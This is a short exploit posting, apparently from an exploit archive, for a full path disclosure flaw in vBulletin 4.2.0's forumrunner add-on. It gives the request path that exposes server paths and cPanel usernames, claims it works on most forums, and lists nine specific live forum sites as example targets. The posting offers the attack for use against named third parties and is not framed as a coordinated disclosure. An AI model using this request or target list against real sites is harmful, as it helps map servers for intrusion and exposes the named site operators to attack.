facebook facebook twitter rss

vBulletin 4.2.0 Full Path Disclosure Vulnerability

Author: CharaAnons , Published: 07-01-2013
#########################################################################
# Author : CharaAnons #
# Exploit Title: **vBulletin 4.2.0 Full Path Disclosure Vulnerability** #
# Date : 07/01/2013 #
# Facebook: fb.com/Anonymous.Leaker #
# Google Dork : #
# Tested on : windows8 Ubuntu 12.10 Backtrack5 #
#########################################################################



**vBulletin 4.2.0 Full Path Disclosure Vulnerability**

//...Leaked bY Anon Leaker..//
//......12.12.2012.....//

The Full Path Disclosure is vBulletin 4.2.0, in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's username.

To see it go to:

http://[path]/forumrunner/include/album.php

It works in 90% of the forums.


Example:
http://www.mgcproducts.com/forumrunner/include/album.php
http://atheistdiscussion.com/forumrunner/include/album.php
http://apolyton.net/forumrunner/include/album.php
http://www.romaniancommunity.net/forumrunner/include/album.php
http://www.ghosthax.com/forumrunner/include/album.php
http://www.reddotcity.net/forumrunner/include/album.php
http://www.sevenskins.com/forum/forumrunner/include/album.php
http://www.purevb.com/forumrunner/include/album.php
http://forum.hackersbrasil.com.br/forumrunner/include/album.php

Like us on Facebook :